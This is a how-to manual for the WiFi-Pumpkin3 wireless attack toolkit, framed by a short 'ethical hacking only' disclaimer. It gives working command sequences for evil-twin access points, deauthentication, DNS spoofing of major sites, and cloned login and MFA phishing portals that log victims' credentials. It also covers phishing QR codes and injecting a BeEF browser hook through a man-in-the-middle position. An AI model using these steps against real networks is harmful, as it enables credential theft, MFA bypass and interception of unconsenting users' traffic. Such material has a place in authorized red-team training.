πŸ“‘ WiFi-Pumpkin3 - Complete Manual

⚠️ Ethical Hacking Use Only β€” Never attack unauthorized networks.

🧰 Installation

WiFi-Pumpkin3 works best on Kali Linux or Parrot OS.

# Clone the repository
git clone https://github.com/P0cL4bs/WiFi-Pumpkin3.git
cd WiFi-Pumpkin3

# Run installer
sudo ./installer.sh --install

# Or manual setup:
sudo apt install python3-pip hostapd dnsmasq
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
sudo python3 wifi-pumpkin.py

βœ… Tip: Run with sudo to avoid interface permission issues.

🌐 Create Rogue Access Point (Evil Twin)

This creates a fake Wi-Fi network with the same SSID as a real one. Victims connect thinking it’s legit.

use accesspoint
set ssid Free_WiFi
set channel 6
start

βœ… Tip: Match the SSID and channel of a real nearby network for best results.

🌍 DNS Spoofing

Redirect specific domain requests to your rogue server/IP.

use dnsspoof
set target_domain facebook.com
set redirect_ip 10.0.0.1
start

To spoof multiple domains, create a DNS mapping file:

facebook.com 10.0.0.1
google.com   10.0.0.1
gmail.com    10.0.0.1

Then:

set dns_file path/to/spooflist.txt
start

βœ… Tip: Combine with CaptiveFlask to serve fake login pages.

πŸšͺ CaptiveFlask – Fake Login & Update Portals

This plugin forces the victim to interact with a fake login/update page.

Available Templates:

use captiveflask
set template facebook
start

Custom templates can be added to:

plugins/captiveflask/templates/

βœ… Example: Serve a fake update screen when victim connects to Free_WiFi.

πŸ” Credential Harvesting

Any credentials entered on fake login pages are logged automatically.

Log Location:

logs/credentials.log

Example Log Entry:

[facebook] 192.168.0.101
username: victim@example.com
password: pass12345

You can tail the log in real-time:

tail -f logs/credentials.log

πŸ’₯ Deauthentication Attack

Disconnects users from legitimate Wi-Fi so they reconnect to your rogue AP.

Steps:

  1. Put Wi-Fi card into monitor mode
  2. Select target MAC
  3. Run deauth attack
# Step 1: Enable monitor mode
sudo airmon-ng start wlan0

# Step 2: Launch WiFi-Pumpkin3
use deauth
set interface wlan0mon
set target_mac AA:BB:CC:DD:EE:FF
start

βœ… Tip: Use airodump-ng to find MAC addresses of targets.

🎭 Phishkin3 – MFA Phishing

Clones real MFA-enabled login portals. Captures username, password, and 2FA token.

Available Templates:

use phishkin3
set template microsoft
start

βœ… Use this only in a lab. Real-time proxying of credentials is for advanced red team simulations.

πŸ“Έ EvilQR3 – QR Code Phishing

Generates phishing QR codes. When scanned by a phone, it opens your rogue site.

Steps:

use evilqr3
set url http://10.0.0.1/facebook
generate

A PNG image file will be created with the QR code. You can print it, send it, or place it in fake environments.

πŸ’‘ Example Use:

πŸ•΅οΈ MITM + JavaScript Injection

Intercepts HTTP traffic and injects your custom JavaScript.

Steps:

use mitm
set inject_js /home/user/scripts/inject.js
start

πŸ“„ Sample JS: Alert Box

// inject-alert.js
alert("⚠️ This is a test from MITM JavaScript injection!");

πŸ“„ Sample JS: BeEF Hook

// inject-beef.js
<script src="http://your-beef-server/hook.js"></script>

πŸ“„ Sample JS: Redirect to Phishing

// redirect.js
window.location.href = "http://10.0.0.1/login";

βœ… Only works on HTTP (unencrypted) traffic. HTTPS cannot be modified this way.

πŸ§ͺ Transparent Proxy

Intercept and modify traffic between client and server silently (MITM-style).

Basic Usage:

use transparentproxy
set inject_js /home/user/scripts/hook.js
start

Example JS for Proxy Injection:

// proxy-inject.js
console.log("βœ… Transparent Proxy Injected Successfully!");
alert("This page was intercepted by the proxy.");

βœ… Ideal for lab-based phishing or hooking browsers with BeEF.

πŸ“Ά WiFi Scanner

Scans for all nearby wireless networks.

Steps:

# First, put adapter into monitor mode:
sudo airmon-ng start wlan0

use scanner
set interface wlan0mon
start

Output Includes:

πŸ” DNS Monitor

Monitors and logs all DNS requests from clients.

Usage:

use dnsmonitor
start

Logs saved to:

logs/dns_requests.log

Example Log Entry:

[10.0.0.101] -> facebook.com
[10.0.0.101] -> google.com

πŸ”Œ RESTful API

WiFi-Pumpkin3 exposes a REST API to control the tool via HTTP requests.

Enable API:

use api
set port 5000
start

Example: Start MITM Module via Curl

curl -X POST http://localhost:5000/start_attack \
  -H "Content-Type: application/json" \
  -d '{"module": "mitm"}'

Other Endpoints:

βœ… You can automate WiFi-Pumpkin3 as part of red team scripts!

πŸ“ Logs & Updates

All captured data is saved for review. Update regularly to get new modules.

Credential Logs:

logs/credentials.log

DNS Requests:

logs/dns_requests.log

To update WiFi-Pumpkin3:

cd WiFi-Pumpkin3
git pull
sudo ./installer.sh --install

βœ… Always update before important testing engagements.

🧱 Creating Custom CaptiveFlask Templates

You can build your own login pages and use them as phishing portals.

Steps:

  1. Create a folder inside plugins/captiveflask/templates
  2. Include index.html, style.css, and logo.png (optional)
  3. Use {{submit}} to define the form submission endpoint

Sample HTML:

<form action="{{submit}}" method="post">
  <input name="username" placeholder="Email" />
  <input name="password" type="password" placeholder="Password" />
  <button type="submit">Login</button>
</form>

βœ… Add realism: match fonts, logos, button styles of real websites.

βš–οΈ Ethical Hacking Usage Reminder

βœ… Use your skills to secure β€” not to harm.

❓ FAQ & Troubleshooting